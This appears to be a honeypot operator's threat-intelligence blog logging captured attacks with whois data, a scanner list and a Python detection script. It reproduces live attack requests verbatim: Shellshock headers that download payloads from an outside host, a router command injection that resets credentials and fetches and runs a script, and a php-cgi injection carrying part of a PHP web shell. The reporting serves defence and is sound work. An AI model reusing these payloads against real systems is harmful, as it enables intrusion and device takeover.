Friday, 4 March 2016

end of life

Good morning,

as you may have already noticed, the posts on this blog have been getting fewer and fewer. This is caused by the fact that my two honeypots have had some issues.

The vservers will be going down soon. So no more analytics.

Thanks to Swen for keeping the German one running for so long. I am currently looking for cheap vservers around the world and talking to some people about funding the operating costs; until then....

This is the end

Thursday, 11 February 2016

159.226.162.196 - #perl wget via 204.232.209.188

BEGIN OF HTTP DATA:
2016-02-11 19:15:33
Source IP: 159.226.162.196
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 109.234.106.8
Connection: Close

END OF DATA

The HTTP server hosting the payload returned 404 at the time of the investigation.


Copyright (c) 2015,2016, Joerg Stephan
All rights reserved.

Disclaimer: This information is provided as-is and there is no guarantee that blocking an IP or domain reported in this overview will not adversely impact your business. Use all information provided at your own risk; the author disclaims all warranty and shall not be liable for any damage or impact caused.

159.226.162[.]196

    Whois Data (TeamCymru)
  • AS : 7497
  • IP : 159.226.162.196
  • BGP Prefix : 159.226.162.0/24
  • CC : CN
  • Registry : apnic
  • Allocated :
  • AS Name: CSTNET-AS-AP Computer Network Information Center,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 213.136.72.84 . shellshock perl via 204.232.209.188
  • Reference: http://sendmespamids.blogspot.com/2016/01/2131367284-shellshock-perl-via.html
  • In db since: 2016-01-22 08:36:12.295000

Sunday, 7 February 2016

178.57.115.231 - (Russian IPs) possible DD-WRT firmware via 178.57.115.231:8081

BEGIN OF HTTP DATA:
2016-02-06 15:33:59
Source IP: 178.57.115.231
GET /cgi-bin/;nvram$IFS\set$IFS\http_passwd;nvram$IFS\set$IFS\http_username;nvram$IFS\commit;sleep$IFS ;cd$IFS\/tmp;wget$IFS\http:\/\/178.57.115.231:8081\/h\/wrt\/ug.sh;chmod$IFSÿ$IFS\/tmp/ug.sh;/bin/sh$IFS\/tmp/ug.sh HTTP/1.0
Host:195.169.125.87:8080

END OF DATA

The ug.sh script tries to download a binary file.

Judging only from the xxd and strings output of that file, it looks like a DD-WRT firmware image.

178.57.115[.]231

    Whois Data (TeamCymru)
  • AS : 60139
  • IP : 178.57.115.231
  • BGP Prefix : 178.57.112.0/21
  • CC : RU
  • Registry : ripencc
  • Allocated : 2010-02-02
  • AS Name: Z-TELECOM Z-Telecom Ltd,RU
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Sunday, 24 January 2016

61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)

BEGIN OF HTTP DATA:
2016-01-23 16:47:13
Source IP: 61.49.45.47
GET / HTTP/1.1
User-Agent: WhatWeb/0.4.8-dev
Host: 109.234.106.8:8080
Connection: close
Accept: */*
For more information see https://user-agents.me/crawler/whatweb048-dev

According to reports on the web, this crawler is meant to identify the web applications running on a server.

61.49.45[.]47

    Whois Data (TeamCymru)
  • AS : 4808
  • IP : 61.49.45.47
  • BGP Prefix : 61.49.0.0/18
  • CC : CN
  • Registry : apnic
  • Allocated : 2001-06-28
  • AS Name: CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network,CN
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/61.49.45.47

Thursday, 21 January 2016

213.136.72.84 - Shellshock perl via 204.232.209.188

BEGIN OF HTTP DATA:
2016-01-20 09:58:59
Source IP: 213.136.72.84
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  ");'
Host: 195.169.125.87
Connection: Close

END OF DATA

213.136.72[.]84

    Whois Data (TeamCymru)
  • AS : 51167
  • IP : 213.136.72.84
  • BGP Prefix : 213.136.72.0/23
  • CC : DE
  • Registry : ripencc
  • Allocated : 2000-02-28
  • AS Name: CONTABO Contabo GmbH,DE
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/213.136.72.84
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/213.136.72.84

204.232.209[.]188

    Whois Data (TeamCymru)
  • AS : 33070
  • IP : 204.232.209.188
  • BGP Prefix : 204.232.192.0/19
  • CC : US
  • Registry : arin
  • Allocated : 2009-06-24
  • AS Name: RMH-14 - Rackspace Hosting,US
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

92.45.197.218 - Zollard php execution

BEGIN OF HTTP DATA:
2016-01-21 09:47:25
Source IP: 92.45.197.218
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F
%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%6
9%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%
66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63
%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 195.169.125.87
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1817
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disabl

END OF DATA
Sadly the request was too long to be fully logged by the fake HTTP server.

Decoded, the POST request line is:
POST /cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n HTTP/1.1
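The three request shapes in these posts (the Shellshock `() { :;};` header with a perl downloader, the `$IFS`-separated command injection against the DD-WRT CGI, and the php-cgi `-d` option injection used by Zollard) are easy to pick out of honeypot logs mechanically. The following is an added example, not code from this blog: it classifies constructed request samples modelled on the captures above, decodes the php-cgi query string the same way as the line just shown, and extracts the dropper URLs. The tag names and the `RISKY_PHP_OPTS` set are my own choices.

```python
import re
from urllib.parse import unquote

# Constructed samples in the honeypot's "BEGIN OF HTTP DATA" shape (request line, then headers).
SAMPLES = [
    "GET HTTP/1.1 HTTP/1.1\nUser-Agent: () { :;};/usr/bin/perl -e 'system(\" wget "
    "http://204.232.209.188/images/freshcafe/slice_30_192.png \");'\nHost: 109.234.106.8",
    "GET /cgi-bin/;nvram$IFS\\set$IFS\\http_passwd;cd$IFS\\/tmp;wget$IFS\\http:\\/\\/178.57.115.231:8081"
    "\\/h\\/wrt\\/ug.sh;/bin/sh$IFS\\/tmp/ug.sh HTTP/1.0\nHost:195.169.125.87:8080",
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+"
    "%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74 HTTP/1.1\n"
    "Host: 195.169.125.87\nUser-Agent: Mozilla/5.0 (compatible; Zollard; Linux)",
    "GET / HTTP/1.1\nUser-Agent: WhatWeb/0.4.8-dev\nHost: 109.234.106.8:8080",
]

SHELLSHOCK = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")   # bash function-definition prefix in a header value
PHP_OPT = re.compile(r"-d\s+([A-Za-z_.]+)=")           # php-cgi "-d name=value" ini overrides
URL = re.compile(r"https?:[\\/]+[^\s;\"']+")           # dropper URLs, possibly backslash-escaped
# php.ini overrides that together turn php-cgi into a remote code loader (own selection)
RISKY_PHP_OPTS = {"allow_url_include", "auto_prepend_file", "safe_mode", "disable_functions", "open_basedir"}


def decode_query(path):
    """Decode a php-cgi query string: '+' is a space, %XX is a byte."""
    return unquote(path.partition("?")[2].replace("+", " "))


def classify(raw):
    """Return method, path, detection tags, php-cgi options and dropper URLs for one logged request."""
    lines = raw.split("\n")
    parts = lines[0].split(" ")
    method, path = parts[0], parts[1] if len(parts) > 1 else ""
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in lines[1:])}
    tags = []
    if any(SHELLSHOCK.search(v) for v in headers.values()):
        tags.append("shellshock-header")
    if "$IFS" in path:                      # whitespace-free command chain in the URL path
        tags.append("ifs-command-injection")
    php_opts = set(PHP_OPT.findall(decode_query(path)))
    if php_opts & RISKY_PHP_OPTS:
        tags.append("php-cgi-argument-injection")
    urls = sorted({u.replace("\\", "") for u in URL.findall(raw)})
    return {"method": method, "path": path, "tags": tags, "php_opts": sorted(php_opts), "urls": urls}


if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```

The extracted URLs are what you would feed into a blocklist or a retro-hunt over proxy logs; the benign WhatWeb scan comes out untagged.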

92.45.197[.]218

    Whois Data (TeamCymru)
  • AS : 34984
  • IP : 92.45.197.218
  • BGP Prefix : 92.45.196.0/23
  • CC : TR
  • Registry : ripencc
  • Allocated : 2007-12-17
  • AS Name: TELLCOM-AS TELLCOM ILETISIM HIZMETLERI A.S.,TR
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois

Wednesday, 13 January 2016

Scanners seen on January 14, 2016

  • 185.130.5.207 - muieblackcat
  • 37.142.32.222 - masscan/1.0
  • 149.78.19.136 - masscan/1.0
  • 195.169.125.87 - zgrab/0.x
  • 185.130.5.235 - muieblackcat

185.130.5[.]207

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.207
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.207
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.207
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

37.142.32[.]222

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 37.142.32.222
  • BGP Prefix : 37.142.32.0/22
  • CC : IL
  • Registry : ripencc
  • Allocated : 2012-02-29
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/37.142.32.222

149.78.19[.]136

    Whois Data (TeamCymru)
  • AS : 12849
  • IP : 149.78.19.136
  • BGP Prefix : 149.78.0.0/19
  • CC : US
  • Registry : arin
  • Allocated :
  • AS Name: HOTNET-IL Hot-Net internet services Ltd.,IL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/149.78.19.136
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/149.78.19.136
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

195.169.125[.]87

    Whois Data (TeamCymru)
  • AS : 1103
  • IP : 195.169.125.87
  • BGP Prefix : 195.169.125.0/24
  • CC : NL
  • Registry : ripencc
  • Allocated :
  • AS Name: SURFNET-NL SURFnet, The Netherlands,NL
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Source: Local Feed Database
  • Title: 50.118.172.34 / 195.169.125.87 - http javascript/html submission
  • Reference: http://sendmespamids.blogspot.com/2015/09/5011817234-http-javascripthtml.html
  • In db since: 2015-09-24 08:17:16.658000
    Source: Local Feed Database
  • Title: 46.172.71.251, 195.169.125.87 - to ping 212.47.238.143
  • Reference: http://sendmespamids.blogspot.com/2016/01/4617271251-19516912587-to-ping.html
  • In db since: 2016-01-09 11:54:24.541062

185.130.5[.]235

    Whois Data (TeamCymru)
  • AS : 203569
  • IP : 185.130.5.235
  • BGP Prefix : 185.130.5.0/24
  • CC : LT
  • Registry : ripencc
  • Allocated : 2015-12-04
  • AS Name: SILK-AS Sindicate Group Ltd,LT
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.235
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/185.130.5.235
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt